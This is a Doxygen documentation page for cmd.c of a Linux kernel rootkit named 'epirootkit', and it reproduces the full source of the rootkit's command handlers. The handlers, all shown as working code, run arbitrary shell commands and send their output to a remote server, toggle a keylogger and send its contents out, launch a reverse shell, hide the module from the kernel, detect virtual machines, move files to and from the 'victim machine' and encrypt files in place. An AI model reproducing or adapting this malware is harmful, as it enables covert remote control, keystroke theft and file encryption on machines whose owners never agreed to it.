#include <linux/delay.h>
#include <linux/fs.h>
#include <linux/kernel.h>
#include <linux/kmod.h>
#include <linux/mm.h>
#include <linux/module.h>
#include <linux/sched.h>
#include <linux/slab.h>
#include <linux/string.h>
#include <linux/uaccess.h>
#include <linux/utsname.h>
#include <linux/vmalloc.h>
#include "crypto.h"
#include "download.h"
#include "epirootkit.h"
#include "io.h"
#include "menu.h"
#include "passwd.h"
#include "sysinfo.h"
#include "upload.h"
#include "vanish.h"

Include dependency graph for cmd.c:

Functions
struct socket *	get_worker_socket (void)

static int	connect_handler (char *args, enum Protocol protocol)

static int	disconnect_handler (char *args, enum Protocol protocol)

static int	ping_handler (char *args, enum Protocol protocol)

static int	change_password_handler (char *args, enum Protocol protocol)

static int	exec_handler (char *args, enum Protocol protocol)

static int	klgon_handler (char *args, enum Protocol protocol)

static int	klgoff_handler (char *args, enum Protocol protocol)

static int	klg_handler (char *args, enum Protocol protocol)

static int	getshell_handler (char *args, enum Protocol protocol)

static int	killcom_handler (char *args, enum Protocol protocol)

static int	hide_module_handler (char *args, enum Protocol protocol)

static int	unhide_module_handler (char *args, enum Protocol protocol)

static int	help_handler (char *args, enum Protocol protocol)

static int	sysinfo_handler (char *args, enum Protocol protocol)

static int	is_in_vm_handler (char *args, enum Protocol protocol)

static int	cipher_handler (char *args, enum Protocol protocol)

static int	uncipher_handler (char *args, enum Protocol protocol)

int	rootkit_command (char *command, unsigned command_size, enum Protocol protocol)

Variables
static struct command	rootkit_commands_array []

Function Documentation

◆ change_password_handler()

static int change_password_handler	(	char *	args,
		enum Protocol	protocol
	)

static

Definition at line 177 of file cmd.c.

                                                                       {
    if (!args || !*args) {
        send_to_server(protocol, "Usage: passwd NEW_PASSWORD\n");
        return -EINVAL;
    }
 
    // Check spaces
    for (char *p = args; *p; p++) {
        if (*p == ' ') {
            send_to_server(protocol, "Password must not contain spaces\n");
            return -EINVAL;
        }
    }
 
    int ret = passwd_set(args);
    if (ret < 0) {
        ERR_MSG("change_password_handler: failed to set password: %d\n", ret);
        send_to_server(protocol, "Failed to set password\n");
        return ret;
    }
 
    send_to_server(protocol, "Password updated\n");
    return SUCCESS;
}

◆ cipher_handler()

static int cipher_handler	(	char *	args,
		enum Protocol	protocol
	)

static

Definition at line 521 of file cmd.c.

                                                              {
    // Read file
    char *buffer = NULL;
    int result = 0;
 
    if ((result = _read_file(args, &buffer)) < 0)
        goto end;
 
    // Cipher buffer
    char *encrypted_buffer = NULL;
    size_t encrypted_len = 0;
 
    if ((result = encrypt_buffer(buffer, result, &encrypted_buffer, &encrypted_len) < 0))
        goto end;
 
    // Write data into file
    if ((result = _write_file(args, encrypted_buffer, encrypted_len)) < 0)
        goto end;
 
end:
    if (result < 0) {
        send_to_server(protocol, "cipher: Error while ciphering file.");
        return result;
    }
 
    send_to_server(protocol, "File successfully ciphered.");
    return result;
}

◆ connect_handler()

static int connect_handler	(	char *	args,
		enum Protocol	protocol
	)

static

Definition at line 202 of file cmd.c.

                                                               {
    if (is_user_auth()) {
        send_to_server(protocol, "You are already authentificated.\n");
        return true;
    }
 
    DBG_MSG("connect_handler: verifying password received: %s...\n", args);
 
    int pv = passwd_verify(args);
    if (pv < 0) {
        ERR_MSG("connect_handler: error verifying password: %d\n", pv);
        return pv;
    }
 
    if (pv == 1) {
        set_user_auth(true);
        DBG_MSG("connect_handler: user authenticated\n");
        send_to_server(protocol, "User authenticated.\n");
        return true;
    }
    else {
        set_user_auth(false);
        ERR_MSG("connect_handler: invalid password\n");
        send_to_server(protocol, "Invalid password.\n");
        msleep(2 * TIMEOUT_BEFORE_RETRY);
        return false;
    }
}

◆ disconnect_handler()

static int disconnect_handler	(	char *	args,
		enum Protocol	protocol
	)

static

Definition at line 231 of file cmd.c.

                                                                  {
    set_user_auth(false);
    send_to_server(protocol, "User successfully disconnected.\n");
    return false;
}

◆ exec_handler()

static int exec_handler	(	char *	args,
		enum Protocol	protocol
	)

static

Definition at line 242 of file cmd.c.

                                                            {
    bool catch_stds = true;
 
    // If first non whitespace character is '-s', set catch_stds to false
    args += strspn(args, " \t");
    if (strncmp(args, "-s ", 3) == 0) {
        catch_stds = false;
        args += 3; // Skip the '-s ' part
    }
 
    // Extract the command from the received message
    char *command = args;
    command[strcspn(command, "\n")] = '\0';
    DBG_MSG("exec_handler: executing command: %s\n", command);
 
    // Execute the command
    int ret_code = exec_str_as_command(command, catch_stds);
    ret_code = ret_code >> 8;
    DBG_MSG("exec_handler: command executed with return code: %d\n", ret_code);
    if (ret_code < 0) {
        ERR_MSG("exec_handler: failed to execute command\n");
        return ret_code;
    }
 
    if (catch_stds) {
        char stdout_msg[] = "stdout:\n";
        int stdout_buff_size = 0;
        char *stdout_buff;
        stdout_buff_size = _read_file(STDOUT_FILE, &stdout_buff);
 
        char stderr_msg[] = "stderr:\n";
        int stderr_buff_size = 0;
        char *stderr_buff;
        stderr_buff_size = _read_file(STDERR_FILE, &stderr_buff);
 
        if (stdout_buff_size < 0 || stderr_buff_size < 0) {
            ERR_MSG("exec_handler: failed to read stdout or stderr files\n");
            send_to_server(protocol, "Failed to read stdout or stderr files\n");
            if (stdout_buff)
                kfree(stdout_buff);
            if (stderr_buff)
                kfree(stderr_buff);
            return -EIO;
        }
 
        char code_msg[32] = { 0 };
        snprintf(code_msg, sizeof(code_msg), "Terminated with code: %d\n",
                 ret_code);
 
        char *output_msg =
            kmalloc(stdout_buff_size + stderr_buff_size + sizeof(stdout_msg) + sizeof(stderr_msg) + sizeof(code_msg),
                    GFP_KERNEL);
        if (!output_msg) {
            ERR_MSG("exec_handler: failed to allocate memory for output message\n");
            kfree(stdout_buff);
            kfree(stderr_buff);
            return -ENOMEM;
        }
        snprintf(output_msg,
                 stdout_buff_size + stderr_buff_size + sizeof(stdout_msg) + sizeof(stderr_msg) + sizeof(code_msg),
                 "%s%s%s%s%s", stdout_msg, stdout_buff, stderr_msg, stderr_buff,
                 code_msg);
 
        send_to_server(protocol, output_msg);
        kfree(output_msg);
        kfree(stdout_buff);
        kfree(stderr_buff);
    }
    else {
        // If not catching stds, just send the return code
        char ret_code_msg[32] = { 0 };
        snprintf(ret_code_msg, sizeof(ret_code_msg), "Terminated with code: %d\n",
                 ret_code);
        send_to_server(protocol, ret_code_msg);
    }
 
    return ret_code;
}

◆ get_worker_socket()

struct socket * get_worker_socket ( void )

extern

Definition at line 17 of file socket.c.

                                       {
    struct socket *s;
    mutex_lock(&worker_socket_lock);
    s = worker_socket;
    mutex_unlock(&worker_socket_lock);
    return s;
}

◆ getshell_handler()

static int getshell_handler	(	char *	args,
		enum Protocol	protocol
	)

static

Definition at line 356 of file cmd.c.

                                                                {
    // remove all trailing space in args
    args += strspn(args, " \t");
    args[strcspn(args, "\n")] = '\0';
    // check if all chars are numbers
    if (args[0] == '\0') {
        DBG_MSG("getshell_handler: no port specified, using default port %d\n",
                REVERSE_SHELL_PORT);
        args = "0";
    }
    long shellport = simple_strtol(args, NULL, 10);
    if (shellport < 0 || shellport > 65535) {
        ERR_MSG("getshell_handler: invalid port number %ld\n", shellport);
        send_to_server(protocol, "Invalid port number\n");
        return -EINVAL;
    }
 
    // Lancer le reverse shell avec le port spécifié
    int ret_code = launch_reverse_shell(args);
 
    if (ret_code < 0) {
        ERR_MSG("getshell_handler: failed to launch reverse shell on port %ld\n",
                shellport);
        send_to_server(protocol, "Failed to launch reverse shell\n");
    }
 
    else
        send_to_server(protocol,
                       "Reverse shell launched successfully on port %ld\n",
                       shellport);
 
    return ret_code;
}

◆ help_handler()

static int help_handler	(	char *	args,
		enum Protocol	protocol
	)

static

Definition at line 101 of file cmd.c.

                                                            {
    int i;
    char *help_msg = kmalloc(STD_BUFFER_SIZE, GFP_KERNEL);
    int offset = snprintf(help_msg, STD_BUFFER_SIZE, "Available commands:\n");
    for (i = 0; rootkit_commands_array[i].cmd_name != NULL; i++) {
        offset += snprintf(help_msg + offset, STD_BUFFER_SIZE - offset,
                           "\t - %s: %s\n", rootkit_commands_array[i].cmd_name,
                           rootkit_commands_array[i].cmd_desc);
        if (offset >= STD_BUFFER_SIZE) {
            ERR_MSG("help_handler: help message truncated\n");
            break;
        }
    }
 
    send_to_server(protocol, help_msg);
 
    kfree(help_msg);
 
    return 0;
}

◆ hide_module_handler()

static int hide_module_handler	(	char *	args,
		enum Protocol	protocol
	)

static

Definition at line 412 of file cmd.c.

                                                                   {
    DBG_MSG("hide_module_handler: hiding module\n");
    int ret_code = hide_module();
    if (ret_code < 0) {
        ERR_MSG("hide_module_handler: failed to hide module\n");
    }
    return ret_code;
}

◆ is_in_vm_handler()

static int is_in_vm_handler	(	char *	args,
		enum Protocol	protocol
	)

static

Definition at line 87 of file cmd.c.

                                                                {
    (void)args;
 
    if (is_running_in_virtual_env()) {
        send_to_server(protocol,
                       "[YES] The rootkit is running in a virtual machine.\n");
    }
    else {
        send_to_server(protocol,
                       "[NOP] The rootkit is not running in a virtual machine.\n");
    }
    return SUCCESS;
}

◆ killcom_handler()

static int killcom_handler	(	char *	args,
		enum Protocol	protocol
	)

static

Definition at line 390 of file cmd.c.

                                                               {
    DBG_MSG("killcom_handler: killcom received, exiting...\n");
 
    // The module will be removed by the usermode helper
    static char *argv[] = { "/usr/sbin/rmmod", "epirootkit", NULL };
    static char *envp[] = { "HOME=/", "PATH=/sbin:/usr/sbin:/bin:/usr/bin", NULL };
 
    // Unhiding module...
    unhide_module();
    int ret_code = unhide_module();
    if (ret_code < 0) {
        ERR_MSG("unhide_module_handler: failed to unhide module\n");
        return ret_code;
    }
 
    DBG_MSG("killcom_handler: calling rmmod from usermode...\n");
 
    call_usermodehelper(argv[0], argv, envp, UMH_NO_WAIT);
 
    return 0;
}

◆ klg_handler()

static int klg_handler	(	char *	args,
		enum Protocol	protocol
	)

static

Definition at line 345 of file cmd.c.

                                                           {
    int ret_code = epikeylog_send_to_server();
    if (ret_code < 0) {
        ERR_MSG("klg_handler: failed to send keylogger content\n");
        send_to_server(protocol, "");
        return ret_code;
    }
    DBG_MSG("klg_handler: keylogger content sent\n");
    return ret_code;
}

◆ klgoff_handler()

static int klgoff_handler	(	char *	args,
		enum Protocol	protocol
	)

static

Definition at line 333 of file cmd.c.

                                                              {
    int ret_code = epikeylog_exit();
    if (ret_code < 0) {
        ERR_MSG("klgoff_handler: failed to deactivate keylogger\n");
        send_to_server(protocol, "");
        return ret_code;
    }
    send_to_server(protocol, "keylogger desactivated\n");
    DBG_MSG("klgoff_handler: keylogger desactivated\n");
    return ret_code;
}

◆ klgon_handler()

static int klgon_handler	(	char *	args,
		enum Protocol	protocol
	)

static

Definition at line 321 of file cmd.c.

                                                             {
    int ret_code = epikeylog_init();
    if (ret_code < 0) {
        ERR_MSG("klgon_handler: failed to activate keylogger\n");
        send_to_server(protocol, "");
        return ret_code;
    }
    send_to_server(protocol, "keylogger activated\n");
    DBG_MSG("klgon_handler: keylogger activated\n");
    return ret_code;
}

◆ ping_handler()

static int ping_handler	(	char *	args,
		enum Protocol	protocol
	)

static

Definition at line 237 of file cmd.c.

                                                            {
    send_to_server(protocol, "pong\n");
    return SUCCESS;
}

◆ rootkit_command()

int rootkit_command	(	char *	command,
		unsigned	command_size,
		enum Protocol	protocol
	)

Definition at line 122 of file cmd.c.

                                            {
    // Handle ongoing download
    if (download(command) == 0) {
        return 0;
    }
 
    // Strip trailing newline if present
    command[strcspn(command, "\n")] = '\0';
 
    // Validate null termination
    DBG_MSG("rootkit_command: received command: \"%s\"\n", command);
    if (command[command_size - 1] != '\0') {
        ERR_MSG("rootkit_command: command is not null-terminated\n");
        return -EINVAL;
    }
 
    // Allow these commands without authentication
    const char *allowed_commands[] = { "connect", "help", "ping", NULL };
 
    if (!is_user_auth()) {
        int allowed = 0;
        for (int i = 0; allowed_commands[i] != NULL; i++) {
            if (strncmp(command, allowed_commands[i], strlen(allowed_commands[i])) == 0) {
                allowed = 1;
                break;
            }
        }
 
        if (!allowed) {
            send_to_server(protocol, "Authentication required. Use the 'connect' "
                                     "command to authenticate.\n");
            ERR_MSG("rootkit_command: unauthorized command without authentication\n");
            return -FAILURE;
        }
    }
 
    // Match command against registered handlers
    for (int i = 0; rootkit_commands_array[i].cmd_name != NULL; i++) {
        if (strncmp(command, rootkit_commands_array[i].cmd_name,
                    rootkit_commands_array[i].cmd_name_size)
            == 0) {
            char *args = command + rootkit_commands_array[i].cmd_name_size;
            while (*args == ' ')
                args++;
            return rootkit_commands_array[i].cmd_handler(args, protocol);
        }
    }
 
    // Unknown command
    ERR_MSG("rootkit_command: unknown command \"%s\"\n", command);
    send_to_server(protocol, "Unknown command\n");
    return -EINVAL;
}

◆ sysinfo_handler()

static int sysinfo_handler	(	char *	args,
		enum Protocol	protocol
	)

static

Definition at line 509 of file cmd.c.

                                                               {
    char *info = get_sysinfo();
    if (!info) {
        send_to_server(protocol, "{error: Failed to retrieve system information}");
        return -ENOMEM;
    }
 
    send_to_server(protocol, info);
    kfree(info);
    return 0;
}

◆ uncipher_handler()

static int uncipher_handler	(	char *	args,
		enum Protocol	protocol
	)

static

Definition at line 550 of file cmd.c.

                                                                {
    // Read file
    char *encrypted_buffer = NULL;
    int result = 0;
 
    if ((result = _read_file(args, &encrypted_buffer)) < 0)
        goto end;
 
    // Uncipher buffer
    char *decrypted_buffer = NULL;
    size_t decrypted_len = 0;
 
    if ((result = decrypt_buffer(encrypted_buffer, result, &decrypted_buffer, &decrypted_len) < 0))
        goto end;
 
    // Write data into file
    if ((result = _write_file(args, decrypted_buffer, decrypted_len)) < 0)
        goto end;
 
end:
    if (result < 0) {
        send_to_server(protocol, "cipher: Error while unciphering file.");
        return result;
    }
 
    send_to_server(protocol, "File successfully unciphered.");
    return result;
}

◆ unhide_module_handler()

static int unhide_module_handler	(	char *	args,
		enum Protocol	protocol
	)

static

Definition at line 421 of file cmd.c.

                                                                     {
    DBG_MSG("unhide_module_handler: unhiding module\n");
    int ret_code = unhide_module();
    if (ret_code < 0) {
        ERR_MSG("unhide_module_handler: failed to unhide module\n");
    }
    return ret_code;
}

Variable Documentation

◆ rootkit_commands_array

struct command rootkit_commands_array[]

static

Definition at line 49 of file cmd.c.

                                                 {
    { "connect", 7, "unlock access to rootkit. Usage: connect [password]", 51,
      connect_handler },
    { "disconnect", 10, "disconnect user", 15, disconnect_handler },
    { "ping", 4, "ping the rootkit", 16, ping_handler },
    { "passwd", 6, "change rootkit password. Usage: passwd NEW_PASSWORD", 51,
      change_password_handler },
    { "exec", 4,
      "execute a shell command. Usage: exec [-s for silent mode] [args*]", 65,
      exec_handler },
    { "klgon", 6, "activate keylogger", 18, klgon_handler },
    { "klgoff", 7, "deactivate keylogger", 20, klgoff_handler },
    { "klg", 3, "send keylogger content to server", 32, klg_handler },
    { "getshell", 8, "launch reverse shell", 20, getshell_handler },
    { "killcom", 7, "exit the module", 15, killcom_handler },
    { "hide_module", 11, "hide the module from the kernel", 31,
      hide_module_handler },
    { "unhide_module", 13, "unhide the module in the kernel", 31,
      unhide_module_handler },
    { "help", 4, "display this help message", 25, help_handler },
    //    { "start_webcam", 11, "activate webcam", 15, start_webcam_handler },
    //    { "capture_image", 13, "capture an image with the webcam", 32,
    //    capture_image_handler }, { "start_microphone", 15, "start recording
    //    from microphone", 31, start_microphone_handler }, { "play_audio", 10,
    //    "play an audio file", 18, play_audio_handler },
    { "hooks", 5, "manage hide/forbid/alter rules", 30, hooks_menu_handler },
    { "upload", 6, "receive a file and save it on disk", 34, upload_handler },
    { "download", 8, "download a file from victim machine", 35,
      download_handler },
    { "sysinfo", 7, "get system information in JSON format", 37,
      sysinfo_handler },
    { "is_in_vm", 8, "check if remote rootkit is running in vm", 40,
      is_in_vm_handler },
    { "cipher", 6, "cipher the file in parameter", 29, cipher_handler },
    { "uncipher", 8, "uncipher the file in parameter", 31, uncipher_handler },
    { NULL, 0, NULL, 0, NULL }
};

Functions

Variables

Function Documentation

◆ change_password_handler()

◆ cipher_handler()

◆ connect_handler()

◆ disconnect_handler()

◆ exec_handler()

◆ get_worker_socket()

◆ getshell_handler()

◆ help_handler()

◆ hide_module_handler()

◆ is_in_vm_handler()

◆ killcom_handler()

◆ klg_handler()

◆ klgoff_handler()

◆ klgon_handler()

◆ ping_handler()

◆ rootkit_command()

◆ sysinfo_handler()

◆ uncipher_handler()

◆ unhide_module_handler()

Variable Documentation

◆ rootkit_commands_array